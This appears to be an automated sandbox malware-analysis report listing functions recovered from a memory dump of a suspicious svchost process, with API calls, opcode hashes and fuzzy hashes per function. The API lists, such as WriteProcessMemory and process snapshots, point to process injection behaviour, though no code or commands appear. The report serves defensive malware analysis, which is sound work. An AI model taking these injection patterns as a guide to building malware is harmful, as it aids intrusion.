API ID: CreateProcess32$BlanketFirstInstanceNextProxySnapshotToolhelp32
String ID:
API String ID: 538798094-0
Opcode ID: a5376a2fc97b6868a9b7d1f0e5bc5da59ed59f900c7c2dad817423f28770f250
Instruction ID: f4b9ebb96475ce2d2d817f8303c2a88e764334689dd9161e56f2c00e8f5e9e27
Opcode Fuzzy Hash: a5376a2fc97b6868a9b7d1f0e5bc5da59ed59f900c7c2dad817423f28770f250
Instruction Fuzzy Hash: 7A311C30B18A484FD794EB2894557AEB7E2FBC8304F91856EE04EC3286DF79C9068746

Uniqueness

Uniqueness Score: -1.00%

Function 0007CC30, Relevance: 3.1, APIs: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32 ref: 0007CC6C
getaddrinfo.WS2_32 ref: 0007CC8C

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: getaddrinfogethostname
String ID:
API String ID: 216350129-0
Opcode ID: aa2d1f9a39ae1fc2a2b7583f59cab3f60177aa3f8a3d3389b5e5a3f43e6201d5
Instruction ID: 6eb79936411daa0667840516a23b61f48539581953b32a6d9c67a07825dfdce9
Opcode Fuzzy Hash: aa2d1f9a39ae1fc2a2b7583f59cab3f60177aa3f8a3d3389b5e5a3f43e6201d5
Instruction Fuzzy Hash: 5921E671F10A468BF7744728C448B767BD1EB99350F69863DC91FC7295DA2C8C81864E

Uniqueness

Uniqueness Score: -1.00%

Function 0006F350, Relevance: 3.1, APIs: 2, Instructions: 84COMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 0006F3C7
CloseHandle.KERNELBASE ref: 0006F43E

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: CloseHandleInformationToken
String ID:
API String ID: 3954737543-0
Opcode ID: f4c4a24a6acb22cc79ab02c2aae436beb7db27dc25f77a0530e29888f41f09bb
Instruction ID: 97430a39d16fdbbb282d50c8e88614045843972dfa7a14d0073073fec81ce454
Opcode Fuzzy Hash: f4c4a24a6acb22cc79ab02c2aae436beb7db27dc25f77a0530e29888f41f09bb
Instruction Fuzzy Hash: 2721FD34618B598FE764DF29E4447ABBBE5FB98741F10462EF886C3260DB34C944CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00067010, Relevance: 3.1, APIs: 2, Instructions: 83synchronizationCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0006705F
CreateMutexW.KERNELBASE ref: 000670AF

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: DescriptorSecurity$ConvertCreateMutexString
String ID:
API String ID: 3336917037-0
Opcode ID: 14c3518b886acbfd2991b146d9ce1ec4c607f828dd3c396cbfe0ee3b2a544e13
Instruction ID: 07a72832242c7a6f428e551ff0edd60cd917f5c867511038cdcac0a487b80006
Opcode Fuzzy Hash: 14c3518b886acbfd2991b146d9ce1ec4c607f828dd3c396cbfe0ee3b2a544e13
Instruction Fuzzy Hash: 78218430219A498FEB94EF28D4587AB77E2FB98304F50492EA08ED3290CB78C9448752

Uniqueness

Uniqueness Score: -1.00%

Function 00067110, Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00067157
WriteFile.KERNELBASE ref: 0006717D

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4abe7362ff6b7ba91f0f119a2bb5bcd363bf4999c92b8ffaa66a87baebf8dfcd
Instruction ID: 1c049abdfd16fc9b5ccd4172722ceb28f5c1cd8e2e4371a65a1cb0aac6aacc3e
Opcode Fuzzy Hash: 4abe7362ff6b7ba91f0f119a2bb5bcd363bf4999c92b8ffaa66a87baebf8dfcd
Instruction Fuzzy Hash: 0C014E3121C6188AD3A8972CAD447BBB6E5FBC5708F54151DF88EC60D0EB28CD01C783

Uniqueness

Uniqueness Score: -1.00%

Function 00069010, Relevance: 3.1, APIs: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00069050
WriteFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000060,00000060), ref: 00069076

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: 237667d7583d0a43690106e33737245597c8380242638b74b1880811a47e6e04
Instruction ID: 0e92f297c6f0351e82022b75fcc577536131a02dd435a698acfebf22768ce4ba
Opcode Fuzzy Hash: 237667d7583d0a43690106e33737245597c8380242638b74b1880811a47e6e04
Instruction Fuzzy Hash: BB01D670308B184FE744AB2D984C75BBAD4FB88328F54862DF48DC3290DF7989458785

Uniqueness

Uniqueness Score: -1.00%

Function 00074180, Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 000741A8
CreateDirectoryW.KERNELBASE ref: 000741D3

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 564552d2309e3358158e0c00f2b382bd37613e272aea3ab5476058c15b53952a
Instruction ID: ebbd3c8966bbbdcc86e78eba4d0d5af425ef2704190a6a4ccb24de0b9789bc6b
Opcode Fuzzy Hash: 564552d2309e3358158e0c00f2b382bd37613e272aea3ab5476058c15b53952a
Instruction Fuzzy Hash: 61F08931E54D184BEB65A738A8083AE7292FB99315F818225D44ED21D5DF2C49478BC5

Uniqueness

Uniqueness Score: -1.00%

Function 0006EE10, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 0006EE1B
CoInitializeSecurity.OLE32 ref: 0006EE56

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Initialize$Security
String ID:
API String ID: 119290355-0
Opcode ID: 2bca9a90dd6e11a1d19d51aa3c2a793cc4639d5afd3d5c1a8065ceb59588dfcf
Instruction ID: 3eb1a4ef56bc9ad2c4b6afcd0900fdca91a594a2af803539afa09d55340442d3
Opcode Fuzzy Hash: 2bca9a90dd6e11a1d19d51aa3c2a793cc4639d5afd3d5c1a8065ceb59588dfcf
Instruction Fuzzy Hash: E0F0A031A183244BE398AF34A81D35BBAE1BB84314F01872EF85AD22D4DF39C85146C1

Uniqueness

Uniqueness Score: -1.00%

Function 00073C90, Relevance: 1.9, APIs: 1, Instructions: 373COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e785b3b7298a785eeda85918b4801863f003f56ec5f106d0f8148bbfad263f2
Instruction ID: 262bb3e117d7885e0b86830847d00bb19b20d2c7c9a702a2e598feba41d8addc
Opcode Fuzzy Hash: 1e785b3b7298a785eeda85918b4801863f003f56ec5f106d0f8148bbfad263f2
Instruction Fuzzy Hash: E0B18030A1CA588FD7A8EB28D85577AB3E1FBC8700F50852EE48EC3255DE38D845C796

Uniqueness

Uniqueness Score: -1.00%

Function 0007C720, Relevance: 1.8, APIs: 1, Instructions: 318COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0007C951

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 89a48d98d8309d766044d8301f725cd6106d0e5ef20aabf8d2003ed7739733af
Instruction ID: 87aa3bc274b515a6e623d75957b7e98151d7875e33d9318955f72e04ee97d189
Opcode Fuzzy Hash: 89a48d98d8309d766044d8301f725cd6106d0e5ef20aabf8d2003ed7739733af
Instruction Fuzzy Hash: E1A17770618B094FE798EB29D895B7A77D1FB98301F00852DD58FC3662DF38D845878A

Uniqueness

Uniqueness Score: -1.00%

Function 00067C70, Relevance: 1.8, APIs: 1, Instructions: 296COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 00067DB3

Part of subcall function 00069010: CreateFileW.KERNELBASE ref: 00069050
Part of subcall function 00069010: WriteFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000060,00000060), ref: 00069076

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: File$AttributesCreateWrite
String ID:
API String ID: 3989674298-0
Opcode ID: 4d95856593b1cc3e10182d20356ef57b8e88e16f7aba473def90246d19aa4b5c
Instruction ID: de926aa2bf4b2ed5f60e5bb8b52d72b029702dfed78fc6eddca9399f529bffca
Opcode Fuzzy Hash: 4d95856593b1cc3e10182d20356ef57b8e88e16f7aba473def90246d19aa4b5c
Instruction Fuzzy Hash: AF91E93061C9088FDB98EB1CD495BB973E2FB98304F5186A9E44EC32A5CB79DD45C782

Uniqueness

Uniqueness Score: -1.00%

Function 000734D0, Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 000736D6

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7e230efac5deb8bea55d3fd6dfcd376bad12a0c7e3bb92b42bc107858bf70f6c
Instruction ID: dc2f9c1d938617c33ac6347a52b5f9e5d83cd26171b61288107f3a58e3aa042c
Opcode Fuzzy Hash: 7e230efac5deb8bea55d3fd6dfcd376bad12a0c7e3bb92b42bc107858bf70f6c
Instruction Fuzzy Hash: 57616B3061CB4C0FE768AB1894457BA77D6EBC9310F40852DE4CFD3252EA69C94587CA

Uniqueness

Uniqueness Score: -1.00%

Function 00074DD0, Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00074F37

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d9efc407f2fcf97d6134b2fb1a5ffb68bab8d590ce433ebcf123e756ade3cca1
Instruction ID: 362097ccc5409eb6754e03d5416af118561e93df95431ce98cf270255849a208
Opcode Fuzzy Hash: d9efc407f2fcf97d6134b2fb1a5ffb68bab8d590ce433ebcf123e756ade3cca1
Instruction Fuzzy Hash: 53415F70618B098FE798DF28C85876AB6E1FB98305F00863EA45EC3690DF39D944CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00063370, Relevance: 1.6, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 000633A2

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: bffec739d2c7cadf54342e41dee3ea67989c00fa5b76e64c8b749c99aab2b515
Instruction ID: 6a8438ce2173b2e786cedbd7a9623c2542bfc1c8a9a5b570411d7007789b9f55
Opcode Fuzzy Hash: bffec739d2c7cadf54342e41dee3ea67989c00fa5b76e64c8b749c99aab2b515
Instruction Fuzzy Hash: 29418530618A488BD7B6D718C4453EEB6E3FBD9300F90492AD04FC3295DE389A82C7C2

Uniqueness

Uniqueness Score: -1.00%

Function 00078610, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8eb31317d67adaa5772398223bce313caf62219f4217edc4e9cd5dc81ca113e
Instruction ID: c094bb16f029a75977354a13f9559bdc1e3814c57166680cfdec75875e1fd83c
Opcode Fuzzy Hash: c8eb31317d67adaa5772398223bce313caf62219f4217edc4e9cd5dc81ca113e
Instruction Fuzzy Hash: EF319331B18A484FD795EB2C94557AEB7E2FBC9300F51C59AE04EC3256DF78C8068786

Uniqueness

Uniqueness Score: -1.00%

Function 00070C80, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 000610D0: WriteProcessMemory.KERNELBASE ref: 00061121

VirtualFreeEx.KERNELBASE ref: 00070D60

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: FreeMemoryProcessVirtualWrite
String ID:
API String ID: 2227173347-0
Opcode ID: e166586c0ebb9d4a8dde963ee71e024c24d1699c6735f61e3903c9f10ba94e9b
Instruction ID: 989de29036ee3da2e3c5d60f97f3ddda7b65aedecc261eae50171550734422bf
Opcode Fuzzy Hash: e166586c0ebb9d4a8dde963ee71e024c24d1699c6735f61e3903c9f10ba94e9b
Instruction Fuzzy Hash: DD216230718E484FE798F72898997ABB6E2FBD8351F80452DB44EC3291DE28DD418746

Uniqueness

Uniqueness Score: -1.00%

Function 00069730, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

VirtualFreeEx.KERNELBASE ref: 00069807

Part of subcall function 000610D0: WriteProcessMemory.KERNELBASE ref: 00061121

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: FreeMemoryProcessVirtualWrite
String ID:
API String ID: 2227173347-0
Opcode ID: d7c0e2007239c7690cb470218c2e670d3e1dceac4874c6f8cd0de160dd5ddaf5
Instruction ID: 0814d1ed7e701961d49367ee70907c90bb5747cc1a91520b64f3139fbd90716b
Opcode Fuzzy Hash: d7c0e2007239c7690cb470218c2e670d3e1dceac4874c6f8cd0de160dd5ddaf5
Instruction Fuzzy Hash: 9321B031618E180FE799A72CA84D7AAB6D3F798311F50452EF44EC3255DE28DD868385

Uniqueness

Uniqueness Score: -1.00%

Function 000708A0, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE ref: 000708C4

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f8f2a16101d6e4545c98565afb6012638f3a9989cc488ca9518bb9d0315d15fa
Instruction ID: 2b0978d61737d59d938818161cdfff023c19a2dd58049dd5c61f660d4571a057
Opcode Fuzzy Hash: f8f2a16101d6e4545c98565afb6012638f3a9989cc488ca9518bb9d0315d15fa
Instruction Fuzzy Hash: C711BC20714D2C4FEB96E72DA8987BE21C3EBDC300F448466904DC33AADE2CCD868781

Uniqueness

Uniqueness Score: -1.00%

Function 00077C20, Relevance: 1.6, APIs: 1, Instructions: 70comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00077C9F

Part of subcall function 000741F0: RtlReAllocateHeap.NTDLL ref: 0007425D

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateCreateHeapInstance
String ID:
API String ID: 2928441540-0
Opcode ID: 2e7ee1956a5eed172cccb16cf13f6e384b0b5e3f9fa09e5aaee9a1122f431880
Instruction ID: d767f7aa30d2cd23145c62680954cdb49282fffe8dfdb50cd38971d9c5461453
Opcode Fuzzy Hash: 2e7ee1956a5eed172cccb16cf13f6e384b0b5e3f9fa09e5aaee9a1122f431880
Instruction Fuzzy Hash: 8F11EB31A18A044BF755EB28EC557A573D2F7D8310F44422AE40EC32D6DF7C9645CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000741F0, Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL ref: 0007425D

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8884d05535212cc0dc2274e6ac97687a64a2072f3082490780e61bd0499a8830
Instruction ID: 6b88e6731fea564e9480fbb7633b496aecf376fa4676006d48b9d44fe740db64
Opcode Fuzzy Hash: 8884d05535212cc0dc2274e6ac97687a64a2072f3082490780e61bd0499a8830
Instruction Fuzzy Hash: E401473171EE194FEB68A79DAC4A63533D1E3D9321B45002BE409C3212DA2CFC1283A5

Uniqueness

Uniqueness Score: -1.00%

Function 000636E0, Relevance: 1.5, APIs: 1, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL ref: 00063726

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 668831bf338e9b978b8d5918e0ae40d9aec3b60f7226a413d2b69bfc9d439fb3
Instruction ID: b76d50d95af6a5daaeeb4f254d9fff0cc303d311fd1f9c3c39af30a42e6987fc
Opcode Fuzzy Hash: 668831bf338e9b978b8d5918e0ae40d9aec3b60f7226a413d2b69bfc9d439fb3
Instruction Fuzzy Hash: BCF096B150C6144FD768EF34E80AA53B6F1FB48318F15C49ED40AC7260E734CB8586C1

Uniqueness

Uniqueness Score: -1.00%

Function 00062870, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 000628BF

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a2b12e74618bbb98d4f7c05f5217ed9df42036b3c5589f3419656e9ab6ba430f
Instruction ID: 4e5beed5f88ff378981905b254670975efb3e987109505c27ae0ed855a38a01b
Opcode Fuzzy Hash: a2b12e74618bbb98d4f7c05f5217ed9df42036b3c5589f3419656e9ab6ba430f
Instruction Fuzzy Hash: 53F0A0306099189FE668E72ACC5A6BA36D7E7D931070040599409D3162CE78AC02C791

Uniqueness

Uniqueness Score: -1.00%

Function 000695B0, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,0001E267,-00000001,0006E617), ref: 000695C6

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fa8e89ff1f9260e2dd82d118bdd8311a3ad428e015d2ef5f2a45ddf22ea0ee78
Instruction ID: b7219ab20a2254c4c075dc24ced8d59de0e78ec575e0faa03532d5ee33785395
Opcode Fuzzy Hash: fa8e89ff1f9260e2dd82d118bdd8311a3ad428e015d2ef5f2a45ddf22ea0ee78
Instruction Fuzzy Hash: 93E08622B49C050219A6723E2C080AE148B9BC527035503A2E81FC3695ED39CD9743D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000649E0, Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

], xrefs: 00064AD6
[, xrefs: 00064ABB

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID: [$]
API String ID: 0-2073744556
Opcode ID: 819f556c905774e5085f50e86716a8bd30e05ad4d410b393550e59cf7836bf09
Instruction ID: c68d3958994b894530a58909fa5eca89f640e855824d1d2b109840020ccacbe4
Opcode Fuzzy Hash: 819f556c905774e5085f50e86716a8bd30e05ad4d410b393550e59cf7836bf09
Instruction Fuzzy Hash: 5C71F331718B044BD368EF69D89577BB2D7EBC8304F50453DE48AC7292EE70EC068686

Uniqueness

Uniqueness Score: -1.00%

Function 000788E0, Relevance: 1.6, Strings: 1, Instructions: 337COMMON

Download Yara Rule

Strings

\, xrefs: 00078A92

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: ff22beab8a1968b1cf20b145c97b4d0a52938afcae2365efea62fccd513eb609
Instruction ID: feaa91b24106d5f55a5e0c0df4fa47b3cfc3a2783695bbb219e4e6be828db6ed
Opcode Fuzzy Hash: ff22beab8a1968b1cf20b145c97b4d0a52938afcae2365efea62fccd513eb609
Instruction Fuzzy Hash: 09A1D331658A094BE7659B18C8997BAB3E2FFC8300F54C56ED14EC72A1DF79D842C386

Uniqueness

Uniqueness Score: -1.00%

Function 00071820, Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64154694004e3a5c4bd036a31419b0a4b43f57ad7b7733c95f4befe1616fdfc0
Instruction ID: 05378aa8be32ae717d0a6ded46f5c1ee914f49ae155476b91c6fed83485fb8ce
Opcode Fuzzy Hash: 64154694004e3a5c4bd036a31419b0a4b43f57ad7b7733c95f4befe1616fdfc0
Instruction Fuzzy Hash: 5FF16031A6CB884BC32D9A6C9C451F9B7D1F799310F54827DD8CFC3283E628E8478689

Uniqueness

Uniqueness Score: -1.00%

Function 00062CCC, Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07086fe500f0094551dd2e6227d94780c60d102334b329ff40cb77ac1a71f59c
Instruction ID: 0e8fa27bf97e5138d38b275e7413dc50c9163477fdeacac5ab8780545d9beaa1
Opcode Fuzzy Hash: 07086fe500f0094551dd2e6227d94780c60d102334b329ff40cb77ac1a71f59c
Instruction Fuzzy Hash: BCE15130618E498FE7A9EF18C495BEA73E3FB98300F54456D984EC72A1DB78D941C782

Uniqueness

Uniqueness Score: -1.00%

Function 00068440, Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a58f5621bf9deda0077983592e8d6309cf0adfa1238c0745734fe771d16e0f
Instruction ID: 5caad8ed1e651a27710469d3e843d70fa0fcd0a53f44988b9277b5575fd319e0
Opcode Fuzzy Hash: c8a58f5621bf9deda0077983592e8d6309cf0adfa1238c0745734fe771d16e0f
Instruction Fuzzy Hash: 1FD1BE3121CB488FD7A4EB28D89576BB3E2FB95310F548A2DE58AC3251DF70D845C782

Uniqueness

Uniqueness Score: -1.00%

Function 00064370, Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ac39a9720abbe45aca3ebe190da487c005de3a296c465f539d3b02ea57e680
Instruction ID: 902043d08873cb04429498ea70eeb8579fda3630cff70ee682cc0680d6e1a211
Opcode Fuzzy Hash: 30ac39a9720abbe45aca3ebe190da487c005de3a296c465f539d3b02ea57e680
Instruction Fuzzy Hash: 32916E139ADEF54AC72E0A3C58951B1BBD2EAA731535E03EDDCDBCB283C815984BC194

Uniqueness

Uniqueness Score: -1.00%

Function 00070EF0, Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e886db0953105f495f9bdecabccd159f8f68ebf2ba966c28c58d12873cca9a13
Instruction ID: 39fac86eab9a3b14f388649f0dd57c51ece11827bebbc3b94b5b3627a6aa2095
Opcode Fuzzy Hash: e886db0953105f495f9bdecabccd159f8f68ebf2ba966c28c58d12873cca9a13
Instruction Fuzzy Hash: 3D91F930B18A4C4BEBA8B76C98457FD72D5EB99350F44C229E54EC32D2DE6CDC818789

Uniqueness

Uniqueness Score: -1.00%

Function 0006A480, Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 12aa3b25006a7f8e8a02718c51a4d82ff50f399d487dea67f10917792602f32c
Instruction ID: 1ce9c44f9102aec063489f7dff22be1e414653d55584c1034d7b6c2382d729e9
Opcode Fuzzy Hash: 12aa3b25006a7f8e8a02718c51a4d82ff50f399d487dea67f10917792602f32c
Instruction Fuzzy Hash: 14913031B1CB584FD7A4EF28945576BB6E2FBC9700F50892EE18ED3255CE3498428B87

Uniqueness

Uniqueness Score: -1.00%

Function 00077650, Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6a05abdae696a9442838eb6e9fcac1c9d53935552f72bd29108d276fc12939e9
Instruction ID: 191107f83a9aab1acdab4bd125d95d3c5a71ff06d2b1a39f9649f408eb605e7f
Opcode Fuzzy Hash: 6a05abdae696a9442838eb6e9fcac1c9d53935552f72bd29108d276fc12939e9
Instruction Fuzzy Hash: 16915071A1CB584FD7A4EB28944576BB7E1FBC8740F50852EE18EC3255DE38D8428B87

Uniqueness

Uniqueness Score: -1.00%

Function 0007D190, Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.56178178771.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84001c21deeaa085a34030257c57640888d70deced4bd599c65c28721ab1fe13
Instruction ID: 6cbb26bb9aaf6e9a9cac2e9824cc94f40af987fe634081f71f242be43ee26031
Opcode Fuzzy Hash: 84001c21deeaa085a34030257c57640888d70deced4bd599c65c28721ab1fe13
